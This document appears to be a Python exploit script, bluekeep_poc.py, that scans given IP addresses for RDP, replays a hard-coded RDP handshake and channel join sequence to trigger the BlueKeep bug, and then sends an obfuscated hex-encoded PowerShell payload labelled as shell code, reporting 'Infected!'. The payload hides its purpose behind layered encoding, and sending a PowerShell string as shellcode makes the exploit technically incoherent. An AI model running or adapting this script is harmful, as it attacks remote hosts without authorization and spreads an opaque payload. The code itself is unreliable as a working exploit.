README.md
Rendering markdown...
import socket
import binascii
import argparse
from OpenSSL import *
from impacket.structure import Structure
magic = ("706f7765727368656c6c202f772031202f432073222276207352202d3b73222276206b5920652222633b7322227620464b4e20282867222276207352292e76616c75652e746f537472696e6728292b2867222276206b59292e76616c75652e746f537472696e672829293b706f7765727368656c6c20286722227620464b4e292e76616c75652e746f537472696e6728292028274a41427241464d415051416e4143514161674253414430414a77416e414673416141424341466f414b41416f414349416251427a41485941597741694143734149674279414349414b774169414851414c67426b414777416241416941436b414b5142644148414164514269414777416151426a4143414163774230414745416441427041474d414941426c414867416441426c414849416267416741456b41626742304146414164414279414341415377426b414849414b41423141476b4162674230414341415a41423341464d4161514236414755414c4141674148554161514275414851414941426841473041627742314147344164414170414473415777426f414549415767416f414349416177426c414849416267426c414777414d7741694143734149674179414349414b774169414334415a41427341477741496741704146304163414231414749416241427041474d414941427a414851415951423041476b415977416741475541654142304147554163674275414341415351427541485141554142304148494149414243414551416377416f41456b4162674230414641416441427941434141624142774146514161414279414755415951426b41454541644142304148494161514269414855416441426c41484d414c4141674148554161514275414851414941426b4148634155774230414745415977427241464d4161514236414755414c41416741456b41626742304146414164414279414341416241427741464d41644142684148494164414242414751415a414279414755416377427a414377414941424a4147344164414251414851416367416741477741634142514147454163674268414730415a5142304147554163674173414341416451427041473441644141674147514164774244414849415a51426841485141615142764147344152674273414745415a77427a414377414941424a414734416441425141485141636741674147774163414255414767416367426c414745415a41424a414751414b514137414673416141424341466f414b414169414773415a514279414734415a51427341444d4149674172414349414d67416941437341496741754147514162414273414349414b5142644148414164514269414777416151426a4143414163774230414745416441427041474d414941426c414867416441426c414849416267416741456b416267423041464141644142794143414156674270414849416441423141474541624142514148494162774230414755415977423041436741535142754148514155414230414849414941427341484141557742304147454163674230414545415a41426b414849415a51427a41484d414c4141674148554161514275414851414941426b414863415577427041486f415a51417341434141645142704147344164414167414759416241424f414755416477425141484941627742304147554159774230414377414941427641485541644141674148554161514275414851414941426b4147674155674170414473415777426f414549415767416f414349416251427a41485941597741694143734149674279414349414b774169414851414c67426b414777416241416941436b4158514277414855415967427341476b415977416741484d4164414268414851416151426a414341415a514234414851415a514279414734414941424a41473441644142514148514163674167414730415a51427441484d415a51423041436741535142754148514155414230414849414941426b4147554163774230414377414941423141476b4162674230414341416377427941474d414c4141674148554161514275414851414941426a4147384164514275414851414b514137414363414a7741374143514161674253414430414a414271414649414c6742794147554163414273414745415977426c41436741496742434145514163774169414377414941416941454d416367426c414745416441426c414651414967417241434941614141694143734149674279414755415951426b414349414b5141374143514161674253414430414a414271414649414c6742794147554163414273414745415977426c414367414967424c4147514163674169414377414941416941474d41595141694143734149674273414349414b774169414777416277426a414349414b5141374143514161674253414430414a414271414649414c6742794147554163414273414745415977426c414367414967426f41454941576741694143774149414169414551416241427341456b4162514277414349414b77416941473841496741724143494163674230414349414b514137414351415551426b414430414967417241444d414d7741734143734151774135414377414b774132414451414c4141724144674151674173414373414e414178414377414b77417a414441414c4141724144674151674173414373414e414177414377414b77417741454d414c4141724144674151674173414373414e774177414377414b774178414451414c4141724145454152414173414373414f514132414377414b774242414551414c4141724144674151674173414373414e514134414377414b774178414441414c4141724144674151674173414373414e51417a414377414b77417a41454d414c414172414441414d774173414373415241417a414377414b774134414549414c414172414455414d674173414373414e774134414377414b77417741444d414c414172414551414d774173414373414f414243414377414b774133414449414c414172414449414d414173414373414d41417a414377414b77424741444d414c41417241444d414d7741734143734151774135414377414b774130414445414c4141724145454152414173414373414d41417a414377414b77424441444d414c414172414467414d514173414373414d774134414377414b774130414463414c414172414459414e514173414373414e774130414377414b774131414441414c414172414463414e5141734143734152674130414377414b774134414445414c414172414463414f414173414373414d414130414377414b774133414449414c4141724144594152674173414373414e67417a414377414b774130414445414c414172414463414e5141734143734152514243414377414b774134414445414c414172414463414f414173414373414d414134414377414b774132414451414c414172414459414e414173414373414e774179414377414b774132414455414c414172414463414e5141734143734152514179414377414b774134414549414c414172414463414d674173414373414d674130414377414b77417741444d414c414172414559414d774173414373414e674132414377414b774134414549414c4141724144414151774173414373414e414246414377414b77413041446b414c4141724144674151674173414373414e774179414377414b77417841454d414c414172414441414d774173414373415267417a414377414b774134414549414c414172414445414e414173414373414f414246414377414b77417741444d414c414172414551414d774173414373414d77417a414377414b77424441446b414c414172414455414d514173414373414e674134414377414b774179414555414c414172414459414e514173414373414e774134414377414b774132414455414c414172414459414f414173414373414e674130414377414b774132414455414c414172414459414d514173414373414e674130414377414b77413141444d414c414172414455414d674173414373414e514178414377414b774132414467414c414172414459414d514173414373414e774179414377414b77413341446b414c414172414451414d514173414373414e674134414377414b77413041454d414c414172414459414f514173414373414e674179414377414b774133414449414c414172414459414f414173414373414e414244414377414b774132414559414c414172414459414d514173414373414e674130414377414b774131414451414c414172414455414d7741734143734152674247414377414b774245414449414c414172414467414d7741734143734151774130414377414b77417741454d414c414172414455414f514173414373414e514177414377414b774131414445414c414172414459414e6741734143734151674135414377414b77413241454d414c4141724144594151774173414373414e514178414377414b774132414467414c4141724144594152674173414373414e674246414377414b774179414555414c414172414459414e414173414373414e674134414377414b774133414455414c414172414463414d674173414373414e674244414377414b774132414551414c414172414455414e4141734143734152674247414377414b774245414441414c414172414467414d7741734143734151774130414377414b774178414441414c4141724144674151674173414373414e514130414377414b774179414451414c414172414441414e414173414373414d77417a414377414b77424441446b414c414172414455414d514173414373414e674132414377414b77424341446b414c414172414459414e514173414373414e414178414377414b774131414445414c41417241444d414d7741734143734151774135414377414b774132414467414c4141724144594152674173414373414e414132414377414b77413241446b414c4141724144594151774173414373414e674134414377414b774132414559414c414172414459414d514173414373414e674130414377414b774131414451414c414172414459414f414173414373414e674247414377414b774133414463414c4141724144594152514173414373414e674244414377414b774132414467414c414172414455414e514173414373414e514179414377414b77413041454d414c414172414451414e414173414373414e514130414377414b774131414441414c41417241455941526741734143734152414179414377414b77417a41444d414c41417241454d414f514173414373414f414245414377414b774131414451414c414172414449414e414173414373414d674130414377414b774131414445414c414172414455414d514173414373414e514179414377414b774246414549414c414172414451414e774173414373414e514178414377414b774247414559414c414172414551414d414173414373414f41417a414377414b774244414451414c4141724144454151774173414373414d77417a414377414b77424441446b414c4141724144554151514173414373414e514243414377414b77413141444d414c414172414455414d674173414373414e514178414377414b774132414467414c414172414463414f414173414373414e674131414377414b77413241444d414c414172414459414d514173414373414f414134414377414b77413041454d414c414172414449414e414173414373414d41417a414377414b774132414467414c414172414455414e774173414373414e674135414377414b774132414555414c414172414451414e514173414373414e514130414377414b77413141444d414c41417241455941526741734143734152414179414377414b774132414545414c414172414441414e514173414373414f414245414377414b77413041454d414c414172414449414e414173414373414d514134414377414b774131414445414c41417241455941526741734143734152414177414377414b77413441444d414c41417241272b27454d414e414173414373414d414244414377414b774131414545414c4141724144554151674173414373414e674134414377414b774132414455414c414172414463414d774173414373414e77417a414377414b774132414445414c414172414467414d774173414373414e674244414377414b774179414451414c414172414441414d774173414373414e674178414377414b774132414467414c414172414455414d414173414373414e774179414377414b774132414559414c414172414459414d774173414373414e674134414377414b774130414455414c414172414463414f414173414373414e674135414377414b774133414451414c414172414455414e414173414373414e51417a414377414b774247414559414c414172414551414d6741734143734152674247414377414b774245414441414c414172414555414f4141734143734151674130414377414b774247414559414c41417241455941526741734143734152674247414377414b774132414467414c414172414463414e414173414373414e774130414377414b774133414441414c41417241444d4159514173414373414d67426d414377414b774179414759414c414172414459414e674173414373414e674135414377414b774132414755414c4141724144594159774173414373414e674135414377414b774133414451414c414172414459414e514173414373414e774134414377414b774179414755414c414172414459414d774173414373414e67426d414377414b774132414751414c414172414449415a674173414373414e774133414377414b774133414441414c414172414449415a414173414373414e674131414377414b774133414449414c414172414463414d674173414373414e67426d414377414b774133414449414c414172414463414d774173414373414d67426d414377414b77413141444d414c414172414459414f414173414373414e67426d414377414b77413241444d414c4141724144594159674173414373414d67426c414377414b774132414455414c414172414463414f414173414373414e674131414377414b77417741444141496741374143514152674243414430415151426b414751414c51425541486b416341426c414341414c514277414745416377427a414341414c514274414341414a4142714146494149414174414534415951427441475541494141694148634162414169414341414c514275414745416251426c41484d414941425541457741574141374143514152674243414430414a414247414549414c6742794147554163414273414745415977426c41436741496742554145774157414169414377414941416941466341615141694143734149674275414349414b77416941444d414d674247414855416267426a4148514161514276414734416377416941436b414f77426241474941655142304147554157774264414630414a4142524147514149414139414341414a414252414751414c6742794147554163414273414745415977426c4143674149674172414349414c41416941476741534142484148674149674170414334416367426c414841416241426841474d415a51416f414349416141424941456341496741734143414149674177414349414b51417541464d416341427341476b416441416f414349414c41416941436b414f77416b41486b41597741394144414165414178414441414d414134414473416151426d414341414b41416b414645415a414175414577414941417441476341644141674144414165414178414441414d41413441436b416577416b41486b4159774139414351415551426b4143344154414239414473414a414247414573415051416b414559415167413641446f4159774268414777416241427641474d414b414177414867414d514177414441414f414173414341414d514170414473415777425641456b4162674230414459414e414264414351415a41426f4146494149414139414341414d4141374147594162774279414367414a4142484145384150514177414473414a4142484145384149414174414777415a51416f414351415551426b414334415441426c414734415a774230414767414c51417841436b414f77416b4145634154774172414373414b514237414351415267424341446f414f674274414755416251427a414755416441416f41467341535142754148514155414230414849415851416f414351415267424c414334415641427641456b416267423041444d414d67416f41436b414b77416b4145634154774170414377414941416b414645415a4142624143514152774250414630414c414167414445414b514239414473414a414247414549414f674136414659416151427941485141645142684147774155414279414738416441426c41474d416441416f414351415267424c4143774149414177414867414d514177414441414f414173414341414d414234414451414d4141734143414157774253414755415a674264414351415a41426f414649414b514137414351415267424341446f414f674244414849415a514268414851415a514255414767416367426c414745415a41416f414441414c414177414867414d414177414377414a414247414573414c414177414377414d414173414441414b514137414363414f77416b41484541564141394146734151774276414734416467426c414849416441426441446f414f674255414738415167426841484d415a51413241445141557742304148494161514275414763414b414262414651415a514234414851414c67424641473441597742764147514161514275414763415851413641446f415651427541476b4159774276414751415a514175414563415a5142304145494165514230414755416377416f414351416177425441436b414b514137414351416367426d4144304149674277414738416477426c414849416377426f4147554162414273414349414f77416b41465941576741394143494156774270414734415a4142764148634163774169414473414a41424e414777415a674167414430414941416941454d414f6742634143514156674261414677416377423541484d4164774276414863414e674130414677414a41425741466f414a4142794147594158414232414445414c674177414677414a414279414759414967413741476b415a67416f41467341535142754148514155414230414849415851413641446f415577427041486f415a514167414330415a514278414341414f414170414873414a41427941475941505141674143514154514273414759416651413741435141516742334143414150514167414349414941416b414849415a674167414330416267427641475541654142704148514149414174414755414941416b4148454156414169414473416151426c414867414941416b414549416477413d2729")
# impacket structures
class TPKT(Structure):
commonHdr = (
('Version', 'B=3'),
('Reserved', 'B=0'),
('Length', '>H=len(TPDU)+4'),
('_TPDU', '_-TPDU', 'self["Length"]-4'),
('TPDU', ':=""'),
)
class TPDU(Structure):
commonHdr = (
('LengthIndicator', 'B=len(VariablePart)+1'),
('Code', 'B=0'),
('VariablePart', ':=""'),
)
def __init__(self, data=None):
Structure.__init__(self, data)
self['VariablePart'] = ''
class CR_TPDU(Structure):
commonHdr = (
('DST-REF', '<H=0'),
('SRC-REF', '<H=0'),
('CLASS-OPTION', 'B=0'),
('Type', 'B=0'),
('Flags', 'B=0'),
('Length', '<H=8'),
)
class DATA_TPDU(Structure):
commonHdr = (
('EOT', 'B=0x80'),
('UserData', ':=""'),
)
def __init__(self, data=None):
Structure.__init__(self, data)
self['UserData'] = ''
class RDP_NEG_REQ(CR_TPDU):
structure = (
('requestedProtocols', '<L'),
)
def __init__(self, data=None):
CR_TPDU.__init__(self, data)
if data is None:
self['Type'] = 1
# packing and unpacking binary data
class Packer(object):
def __init__(self, packet):
self.packet = packet
def bin_unpack(self):
return binascii.unhexlify(self.packet)
def bin_pack(self):
return binascii.hexlify(self.packet)
# PDU control sequence
class DoPduConnectionSequence(object):
@staticmethod
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/db6713ee-1c0e-4064-a3b3-0fac30b4037b
def connection_request_pdu():
packet = "030000130ee000000000000100080003000000"
return Packer(packet).bin_unpack()
@staticmethod
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/04c60697-0d9a-4afd-a0cd-2cc133151a9c
def domain_request_pdu():
packet = "0300000c02f0800400010001"
return Packer(packet).bin_unpack()
@staticmethod
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/f5d6a541-9b36-4100-b78f-18710f39f247
def mcs_attach_user_request_pdu():
packet = "0300000802f08028"
return Packer(packet).bin_unpack()
@staticmethod
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/db6713ee-1c0e-4064-a3b3-0fac30b4037b
def mcs_connect_init_pdu():
packet = (
"030001ee02f0807f658201e20401010401010101ff30190201220201020201000201010201000201010202ffff02010230190201"
"0102010102010102010102010002010102020420020102301c0202ffff0202fc170202ffff0201010201000201010202ffff0201"
"0204820181000500147c00018178000800100001c00044756361816a01c0ea000a0008008007380401ca03aa09040000b11d0000"
"4400450053004b0054004f0050002d004600380034003000470049004b00000004000000000000000c0000000000000000000000"
"00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
"0000000001ca01000000000018000f00af07620063003700380065006600360033002d0039006400330033002d00340031003938"
"0038002d0039003200630066002d0000310062003200640061004242424207000100000056020000500100000000640000006400"
"000004c00c00150000000000000002c00c001b0000000000000003c0680005000000726470736e6400000f0000c0636c69707264"
"72000000a0c0647264796e766300000080c04d535f5431323000000000004d535f5431323000000000004d535f54313230000000"
"00004d535f5431323000000000004d535f543132300000000000"
)
return Packer(packet).bin_unpack()
@staticmethod
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/772d618e-b7d6-4cd0-b735-fa08af558f9d
def client_info_pdu():
packet = (
"0300016102f08064000703eb7081524000a1a509040904bb47030000000e00080000000000000042007200770041006600660079"
"000000740074007400740000000000000002001c00310030002e0030002e0030002e003700360000000000000000000000400043"
"003a005c00570049004e0044004f00570053005c00730079007300740065006d00330032005c006d007300740073006300610078"
"002e0064006c006c000000a40100004d006f0075006e007400610069006e0020005300740061006e006400610072006400200054"
"0069006d006500000000000000000000000000000000000000000000000b00000001000200000000000000000000004d006f0075"
"006e007400610069006e0020004400610079006c0069006700680074002000540069006d00650000000000000000000000000000"
"0000000000000000000300000002000200000000000000c4ffffff0100000006000000000064000000"
)
return Packer(packet).bin_unpack()
@staticmethod
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4c3c2710-0bf0-4c54-8e69-aff40ffcde66
def client_active_confirmation_pdu():
packet = (
"0300026302f08064000703eb70825454021300f003ea030100ea0306003e024d5354534300170000000100180001000300000200"
"0000001d04000000000000000002001c00200001000100010080073804000001000100001a010000000300580000000000000000"
"0000000000000000000000000001001400000001000000aa00010101010100000101010001000000010101010101010100010101"
"0000000000a1060600000000000084030000000000e404000013002800030000037800000078000000fc09008000000000000000"
"000000000000000000000000000a0008000600000007000c00000000000000000005000c00000000000200020008000a00010014"
"00150009000800000000000d005800910020000904000004000000000000000c0000000000000000000000000000000000000000"
"00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c00080001"
"0000000e0008000100000010003400fe000400fe000400fe000800fe000800fe001000fe002000fe004000fe008000fe00000140"
"00000800010001030000000f0008000100000011000c00010000000028640014000c00010000000000000015000c000200000000"
"0a00011a000800af9400001c000c0012000000000000001b00060001001e0008000100000018000b0002000000030c001d005f00"
"02b91b8dca0f004f15589fae2d1a87e2d6010300010103d4cc44278a9d744e803c0ecbeea19c5405310031000000010000002500"
"0000c0cb080000000100c1cb1d00000001c0cf0200080000014000020101010001400002010104"
)
return Packer(packet).bin_unpack()
@staticmethod
def client_control_request_pdu():
packet = (
"0300003402f08064000603eb7026080081f83b8bb47256ffd1d64b171eaef68ddd75a0a316972912b7cf14c9110bd8c8faa1813a"
)
return Packer(packet).bin_unpack()
@staticmethod
def client_control_cooperate_pdu():
packet = (
"0300003402f08064000603eb7026080081f80403def791a37caf3f7a624e3bfeb67a28bf0d4f312703b94af1e626f0bdc5710a53"
)
return Packer(packet).bin_unpack()
@staticmethod
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/2d122191-af10-4e36-a781-381e91c182b7
def client_persistent_key_length_pdu():
packet = (
"0300010d02f08064000603eb7080fe08009016cec64a69d9d3499e10a5040fcfab4f6a3bda31034f29bd643e9846ec0a1dcd9cad"
"1358a3bd8b9daef1e99d439653f5d0b75088f381f1cbad1755759c5fefeca93540b37406d1aed1159fed9149a63d1fc131b11758"
"da0e24df1f878639d14666ea0e98d04b5b7b01b98ae8683280dab958a69f4fb5ba7904aed963c06aa8815197250b3fc3d247fa0a"
"7a221fbd5f4eb800ea3206e6af15e46fb3d3c14ccb0a8edda729070359c1c1081baa563cf5d089e3cdcf268b65590acb7e81b633"
"bb4d9a1380e7572a0d1d11b418c4312f4f897709942ec38ebffd6a392b47740e1274ec4514c36b27d6b69311a4bc46de694ab454"
"c72424998f60b72159"
)
return Packer(packet).bin_unpack()
@staticmethod
def client_font_list_pdu():
packet = (
"0300003402f08064000603eb7026080080fe98195cfb9292f59718b2b7c313dc03fb6445c0436d913726fd8e71e6f22a1eae3503"
)
return Packer(packet).bin_unpack()
@staticmethod
def do_join_request(size=30, do_padding=False):
channels, pdu_channels = range(1001, 1008), []
request_packets = {
"dep": "0300000c02f080380006",
"req": "0300000c02f080380008",
"ms_t120": "4d535f5431323000000000"
}
padding = "41" * size
if do_padding:
exp = request_packets["dep"] + request_packets["ms_t120"] + padding
results = Packer(exp).bin_unpack()
else:
for channel in channels:
current_channel = request_packets["req"] + \
hex(channel)[2:].zfill(4)
pdu_channels.append(Packer(current_channel).bin_unpack())
results = pdu_channels
return results
@staticmethod
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9cde84cd-5055-475a-ac8b-704db419b66f
def do_client_security_pdu_exchange():
packet = (
"0300005e02f08064000603eb7050010200004800000091ac0c8f648c39f4e7ff0a3b79115c13512acb728f9db7422ef7084c8eae"
"559962d28181e466c805ead473063fc85faf2afdfcf164b33f0a151ddb2c109d30110000000000000000"
)
return Packer(packet).bin_unpack()
@staticmethod
def client_synchronization_pdu():
packet = (
"0300003002f08064000603eb7022280081f859ffcb2f73572b42db882e23a997c2b1f574bc49cc8ad8fd608a7af64475"
)
return Packer(packet).bin_unpack()
class Parser(argparse.ArgumentParser):
def __init__(self):
super(Parser, self).__init__()
@staticmethod
def optparse():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ip", dest="ipAddyList", default=None,
help="provide a list of IP addresses separated by commas, or a single IP address"
)
parser.add_argument("-f", "--file", dest="ipAddyFile", default=None,
help="provide a file containing IP addresses, one per line")
return parser.parse_args()
# constants
GIS_RDP = []
TPDU_CONNECTION_REQUEST = 0xe0
TYPE_RDP_NEG_REQ = 1
PROTOCOL_SSL = 1
def info(string):
print("[ \033[32m+\033[0m ] {}".format(string))
def error(string):
print("[ \033[31m!\033[0m ] {}".format(string))
# connect the sockets and return the received data plus the connection in a Tuple
def socket_connection(obj, address, port=3389, receive_size=4000):
try:
session = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
session.connect((address, port))
session.sendall(obj)
return session.recv(receive_size), session
except Exception as e:
error(e)
return None
# check if the ip is running RDP or not
def check_rdp_service(address):
rdp_correlation_packet = Packer(
"436f6f6b69653a206d737473686173683d75736572300d0a010008000100000000"
).bin_unpack()
test_packet = DoPduConnectionSequence().connection_request_pdu()
send_packet = test_packet + rdp_correlation_packet
results = socket_connection(send_packet, address, receive_size=9126)
if results is not None:
if results[0]:
info("successfully connected to RDP service on host: {}".format(address))
GIS_RDP.append(address)
else:
error("unknown response provided from RDP session")
else:
error("unable to connect")
# start the connection like a boss
def start_rdp_connection(ip_addresses):
tpkt = TPKT()
tpdu = TPDU()
rdp_neg = RDP_NEG_REQ()
rdp_neg['Type'] = TYPE_RDP_NEG_REQ
rdp_neg['requestedProtocols'] = PROTOCOL_SSL
tpdu['VariablePart'] = rdp_neg.getData()
tpdu['Code'] = TPDU_CONNECTION_REQUEST
tpkt['TPDU'] = tpdu.getData()
for ip in ip_addresses:
try:
ip = ip.strip()
results = socket_connection(tpkt.getData(), ip, receive_size=1024)
ctx = SSL.Context(SSL.TLSv1_METHOD)
tls = SSL.Connection(ctx, results[1])
tls.set_connect_state()
tls.do_handshake()
# initialization packets (X.224)
info("sending Client MCS Connect Initial PDU request packet -->")
tls.sendall(DoPduConnectionSequence().mcs_connect_init_pdu())
returned_packet = tls.recv(8000)
info(
"<-- received {} bytes from host: {}".format(hex(len(returned_packet)), ip))
# erect domain and attach user to domain
info("sending Client MCS Domain Request PDU packet -->")
tls.sendall(DoPduConnectionSequence().domain_request_pdu())
info("sending Client MCS Attach User PDU request packet -->")
tls.sendall(DoPduConnectionSequence(
).mcs_attach_user_request_pdu())
returned_packet = tls.recv(8000)
info(
"<-- received {} bytes from host: {}".format(hex(len(returned_packet)), ip))
# send join requests on ridiculously high channel numbers to trigger the bug
info("sending MCS Channel Join Request PDU packets -->")
pdus = DoPduConnectionSequence().do_join_request()
for pdu in pdus:
tls.sendall(pdu)
channel_number = int(Packer(pdu).bin_pack()[-4:], 16)
returned_packet = tls.recv(1024)
info("<-- received {} bytes from channel {} on host: {}".format(
hex(len(returned_packet)), channel_number, ip
))
# my personal favorite is the security exchange, took me awhile to figure this one out
info("sending Client Security Exhcange PDU packets -->")
tls.sendall(DoPduConnectionSequence(
).do_client_security_pdu_exchange())
tls.sendall(DoPduConnectionSequence().client_info_pdu())
returned_packet = tls.recv(8000)
info("<-- received {} bytes from host: {}".format(
hex(len(returned_packet)), ip
))
# confirm that the client is now active
confirm_packet = (
"0300026302f08064000703eb70825454021300f003ea030100ea0306003e024d5354534300170000000100180001000300000"
"2000000001d04000000000000000002001c00200001000100010080073804000001000100001a010000000300580000000000"
"0000000000000000000000000000000001001400000001000000aa00010101010100000101010001000000010101010101010"
"1000101010000000000a1060600000000000084030000000000e404000013002800030000037800000078000000fc09008000"
"000000000000000000000000000000000000000a0008000600000007000c00000000000000000005000c00000000000200020"
"008000a0001001400150009000800000000000d005800910020000904000004000000000000000c0000000000000000000000"
"00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
"000000000000c000800010000000e0008000100000010003400fe000400fe000400fe000800fe000800fe001000fe002000fe"
"004000fe008000fe0000014000000800010001030000000f0008000100000011000c00010000000028640014000c000100000"
"00000000015000c0002000000000a00011a000800af9400001c000c0012000000000000001b00060001001e00080001000000"
"18000b0002000000030c001d005f0002b91b8dca0f004f15589fae2d1a87e2d6010300010103d4cc44278a9d744e803c0ecbe"
"ea19c54053100310000000100000025000000c0cb080000000100c1cb1d00000001c0cf020008000001400002010101000140"
"0002010104"
)
info("sending Client Confirm Active PDU packet -->")
tls.sendall(Packer(confirm_packet).bin_unpack())
returned_packet = tls.recv(1024)
info(
"<-- received {} bytes from host: {}".format(hex(len(returned_packet)), ip))
# finish the connection sequence
info("sending Client Synchronization PDU packet -->")
tls.sendall(DoPduConnectionSequence().client_synchronization_pdu())
info("sending Client Control Cooperate PDU packet -->")
tls.sendall(DoPduConnectionSequence(
).client_control_cooperate_pdu())
info("sending Client Control Requesr PDU packet -->")
tls.sendall(DoPduConnectionSequence().client_control_request_pdu())
info("sending Client Persistent Key Length PDU packet -->")
tls.sendall(DoPduConnectionSequence(
).client_persistent_key_length_pdu())
info("sending Client Font List PDU packet -->")
tls.sendall(DoPduConnectionSequence().client_font_list_pdu())
info("sending shell code --->")
tls.sendall(bytes(magic, "utf-8"))
info("Infected!")
info(ip)
info(results[1])
results[1].close()
except Exception as e:
error("unable to connect: {}".format(e))
continue
def main():
to_scan = []
opt = Parser().optparse()
if opt.ipAddyList is not None:
for ip in opt.ipAddyList.split(","):
to_scan.append(ip)
elif opt.ipAddyFile is not None:
try:
open(opt.ipAddyFile).close()
except IOError:
error("that file doesn't exist?")
exit(1)
with open(opt.ipAddyFile) as addresses:
for address in addresses.readlines():
to_scan.append(address.strip())
else:
info(
"python bluekeep_poc.py [-i addy1[,addy2,...]] [-f /path/to/file]")
exit(1)
for scan in to_scan:
info("verifying RDP service on: {}".format(scan))
check_rdp_service(scan)
info("starting RDP connection on {} targets".format(len(GIS_RDP)))
print("\n\n")
start_rdp_connection(GIS_RDP)
if __name__ == "__main__":
print("""\033[34m
____ _ _ __
| _ \| | | |/ /
| |_) | |_ _ ___| ' / ___ ___ _ __
| _ <| | | | |/ _ \ < / _ \/ _ \ '_ \
| |_) | | |_| | __/ . \ __/ __/ |_) |
|____/|_|\__,_|\___|_|\_\___|\___| .__/
| |
|_|
\033[0m""")
main()